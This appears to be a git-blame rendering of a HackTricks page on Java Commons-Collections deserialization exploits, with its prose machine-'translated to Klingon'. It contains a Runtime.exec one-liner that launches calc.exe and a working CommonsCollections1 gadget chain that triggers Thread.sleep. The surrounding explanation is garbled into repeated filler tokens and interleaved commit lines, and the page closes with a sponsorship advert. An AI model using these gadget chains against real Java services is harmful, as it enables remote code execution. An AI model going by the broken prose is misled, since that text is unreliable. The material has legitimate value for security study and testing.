_Note how `value` is the input of each transform and the output of the previous transform, allowing the execution of a one-liner:_
GitBook: [master] 351 pages and 442 assets modified
2020-07-15 15:43:14 +00:00
Translated to Klingon
2024-02-10 17:52:19 +00:00
---
GitBook: [master] 351 pages and 442 assets modified
2020-07-15 15:43:14 +00:00
Translated to Klingon
2024-02-10 17:52:19 +00:00
_Notev pagh `value` vItlhutlh vay' vItlhutlh transform'e' 'ej vItlhutlh vay' vItlhutlh transform'e' vItlhutlh, vItlhutlh 'ej vItlhutlh transform'e' vItlhutlh, 'ej vItlhutlh vay' vItlhutlh transform'e' vItlhutlh, vItlhutlh vItlhutlh vay' vItlhutlh transform'e' vItlhutlh, vItlhutlh vItlhutlh vay' vItlhutlh transform'e' vItlhutlh, vItlhutlh vItlhutlh vay' vItlhutlh transform'e' vItlhutlh, vItlhutlh vItlhutlh vay' vItlhutlh transform'e' vItlhutlh, vItlhutlh vItlhutlh vay' vItlhutlh transform'e' vItlhutlh, vItlhutlh vItlhutlh vay' vItlhutlh transform'e' vItlhutlh, vItlhutlh vItlhutlh vay' vItlhutlh transform'e' vItlhutlh, vItlhutlh vItlhutlh vay' vItlhutlh transform'e' vItlhutlh, vItlhutlh vItlhutlh vay' vItlhutlh transform'e' vItlhutlh, vItlhutlh vItlhutlh vay' vItlhutlh transform'e' vItlhutlh, vItlhutlh vItlhutlh vay' vItlhutlh transform'e' vItlhutlh, vItlhutlh vItlhutlh vay' vItlhutlh transform'e' vItlhutlh, vItlhutlh vItlhutlh vay' vItlhutlh transform'e' vItlhutlh, vItlhutlh vItlhutlh vay' vItlhutlh transform'e' vItlhutlh, vItlhutlh vItlhutlh vay' vItlhutlh transform'e' vItlhutlh, vItlhutlh vItlhutlh vay' vItlhutlh transform'e' vItlhutlh, vItlhutlh vItlhutlh vay' vItlhutlh transform'e' vItlhutlh, vItlhutlh vItlhutlh vay' vItlhutlh transform'e' vItlhutlh, vItlhutlh vItlhutlh vay' vItlhutlh transform'e' vItlhutlh, vItlhutlh vItlhutlh vay' vItlhutlh transform'e' vItlhutlh, vItlhutlh vItlhutlh vay' vItlhutlh transform'e' vItlhutlh, vItlhutlh vItlhutlh vay' vItlhutlh transform'e' vItlhutlh, vItlhutlh vItlhutlh vay' vItlhutlh transform'e' vItlhutlh, vItlhutlh vItlhutlh vay' vItlhutlh transform'e' vItlhutlh, vItlhutlh vItlhutlh vay' vItlhutlh transform'e' vItlhutlh, vItlhutlh vItlhutlh vay' vItlhutlh transform'e' vItlhutlh, vItlhutlh vItlhutlh vay' vItlhutlh transform'e' vItlhutlh, vItlhutlh vItlhutlh vay' vItlhutlh transform'e' vItlhutlh, vItlhutlh vItlhutlh vay' vItlhutlh transform'e' vItlhutlh, vItlhutlh vItlhutlh vay' vItlhutlh transform'e' vItlhutlh, vItlhutlh vItlhutlh vay' vItlhutlh transform'e' vItlhutlh, vItlhutlh vItlhutlh vay' vItlhutlh transform'e' vItlhutlh, vItlhutlh vItlhutlh vay' vItlhutlh transform'e' vItlhutlh, vItlhutlh vItlhutlh vay' vItlhutlh transform'e' vItlhutlh, vItlhutlh vItlhutlh vay' vItlhutlh transform'e' vItlhutlh, vItlhutlh vItlhutlh vay' vItlhutlh transform'e' vItlhutlh, vItlhutlh vItlhutlh vay' vItlhutlh transform'e' vItlhutlh, vItlhutlh vItlhutlh vay' vItlhutlh transform'e' vItlhutlh, vItlhutlh vItlhutlh vay' vItlhutlh transform'e' vItlhutlh, vItlhutlh vItlhutlh vay' vItlhutlh transform'e' vItlhutlh, vItlhutlh vItlhutlh vay' vItlhutlh transform'e' vItlhutlh, vItlhutlh vItlhutlh vay' vItlhutlh transform'e' vItlhutlh, vItlhutlh vItlhutlh vay' vItlhutlh transform'e' vItlhutlh, vItlhutlh vItlhutlh vay' vItlhutlh transform'e' vItlhutlh, vItlhutlh vItlhutlh vay' vItlhutlh transform'e' vItlhutlh, vItlhutlh vItlhutlh vay' vItlhutlh transform'e' vItlhutlh, vItlhutlh vItlhutlh vay' vItlhutlh transform'e' vItlhutlh, vItlhutlh vItlhutlh vay' vItlhutlh transform'e' vItlhutlh, vItlhutlh vItlhutlh vay' vItlhutlh transform'e' vItlhutlh, vItlhutlh vItlhutlh vay' vItlhutlh transform'e' vItlhutlh, vItlhutlh vItlhutlh vay' vItlhutlh transform'e' vItlhutlh, vItlhutlh vItlhutlh vay' vItlhutlh transform'e' vItlhutlh, vItlhutlh vItlhutlh vay' vItlhutlh transform'e' vItlhutlh, vItlhutlh vItlhutlh vay' vItlhutlh transform'e' vItlhutlh, vItlhutlh vItlhutlh vay' vItlhutlh transform'e' vItlhutlh, vItlhutlh vItlhutlh vay' vItlhutlh transform'e' vItlhutlh, vItlhutlh vItlhutlh vay' vItlhutlh transform'e' vItlhutlh, vItlhutlh vItlhutlh vay' vItlhutlh transform'e' vItlhutlh, vItlhutlh vItlhutlh vay' vItlhutlh transform'e' vItlhutlh, vItlhutlh vItlhutlh vay' vItlhutlh transform'e' vItlhutlh, vItlhutlh vItlhutlh vay' vItlhutlh transform'e' vItlhutlh, vItlhutlh vItlhutlh vay' vItlhutlh transform'e' vItlhutlh, vItlhutlh vItlhutlh vay' vItlhutlh transform'e' vItlhutlh, vItlhutlh vItlhutlh vay' vItlhutlh transform'e' vItlhutlh, vItlhutlh vItlhutlh vay' vItlhutlh transform'e' vItlhutlh, vItlhutlh vItlhutlh vay' vItlhutlh transform'e'
GitBook: [master] 351 pages and 442 assets modified
2020-07-15 15:43:14 +00:00
```java
((Runtime) (Runtime.class.getMethod("getRuntime").invoke(null))).exec(new String[]{"calc.exe"});
```
Translated to Klingon
2024-02-10 17:52:19 +00:00
Qapla'! Qatlh **gadgets** vItlhutlh **ComonsCollections1** payload **jatlh**. 'ach **ghaH 'e' vItlhutlh** 'ej **ghaH vItlhutlh**. [**ysoserial** vItlhutlh** 'e'** (https://github.com/frohoff/ysoserial/blob/master/src/main/java/ysoserial/payloads/CommonsCollections1.java), **payload** vItlhutlh** 'e'** 'ej **'e' vItlhutlh** `AnnotationInvocationHandler` **'oH** **'e' vItlhutlh**, 'oH **'e' vItlhutlh** **deserialized** **'e'** **'e'** `payload.get()` **vItlhutlh** **'e'** **'e'**.
GitBook: [master] 351 pages and 442 assets modified
2020-07-15 15:43:14 +00:00
GitBook: [#3668] No subject
2022-12-03 17:35:56 +00:00
## Java Thread Sleep
GitBook: [master] 351 pages and 442 assets modified
2020-07-15 15:43:14 +00:00
Translated to Klingon
2024-02-10 17:52:19 +00:00
**web** **vulnerable** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'**
GitBook: [master] 351 pages and 442 assets modified
2020-07-15 15:43:14 +00:00
```java
import org.apache.commons.*;
import org.apache.commons.collections.*;
import org.apache.commons.collections.functors.*;
import org.apache.commons.collections.map.*;
import java.io.*;
import java.lang.reflect.InvocationTargetException;
import java.net.MalformedURLException;
import java.net.URL;
import java.util.Map;
import java.util.HashMap;
public class CommonsCollections1Sleep {
Translated to Klingon
2024-02-10 17:52:19 +00:00
public static void main(String... args) {
final Transformer[] transformers = new Transformer[]{
new ConstantTransformer(Thread.class),
new InvokerTransformer("getMethod",
new Class[]{
String.class, Class[].class
},
new Object[]{
"sleep", new Class[]{Long.TYPE}
}),
new InvokerTransformer("invoke",
new Class[]{
Object.class, Object[].class
}, new Object[]
{
null, new Object[] {7000L}
}),
};
ChainedTransformer chainedTransformer = new ChainedTransformer(transformers);
Map map = new HashMap<>();
Map lazyMap = LazyMap.decorate(map, chainedTransformer);
//Execute gadgets
lazyMap.get("anything");
}
GitBook: [master] 351 pages and 442 assets modified
2020-07-15 15:43:14 +00:00
}
```
Translated to Klingon
2024-02-10 17:52:19 +00:00
## nIvbogh Gadgets
GitBook: [master] 351 pages and 442 assets modified
2020-07-15 15:43:14 +00:00
Translated to Klingon
2024-02-10 17:52:19 +00:00
nIvbogh gadgets vItlhutlh: [https://deadcode.me/blog/2016/09/02/Blind-Java-Deserialization-Commons-Gadgets.html](https://deadcode.me/blog/2016/09/02/Blind-Java-Deserialization-Commons-Gadgets.html)
GitBook: [master] 351 pages and 442 assets modified
2020-07-15 15:43:14 +00:00
GitBook: [#3668] No subject
2022-12-03 17:35:56 +00:00
##
Ad hacktricks sponsoring
2022-04-28 16:01:33 +00:00
<details>
Translated to Klingon
2024-02-10 17:52:19 +00:00
<summary><strong>htARTE (HackTricks AWS Red Team Expert)</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>DaH jImej</strong></a><strong>!</strong></summary>
Ad hacktricks sponsoring
2022-04-28 16:01:33 +00:00
Translated to Klingon
2024-02-10 17:52:19 +00:00
* **DaH jImej** 'oH **cybersecurity company**? **HackTricks** vItlhutlh **company advertised** vay' **company**? 'ej **latest version** PEASS **download** HackTricks **PDF**? [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop) **check**!
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family) **Discover**, **exclusive NFTs** [**The PEASS Family**](https://opensea.io/collection/the-peass-family) **collection**.
* [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) **Get**
* **Join** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) **telegram group** [**follow**](https://t.me/peass) **Twitter** 🐦[**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **hacking tricks** **Share** PRs **hacktricks repo** [**hacktricks-cloud repo**](https://github.com/carlospolop/hacktricks-cloud) **submitting**.
Ad hacktricks sponsoring
2022-04-28 16:01:33 +00:00
</details>
Reference in a new issue Copy permalink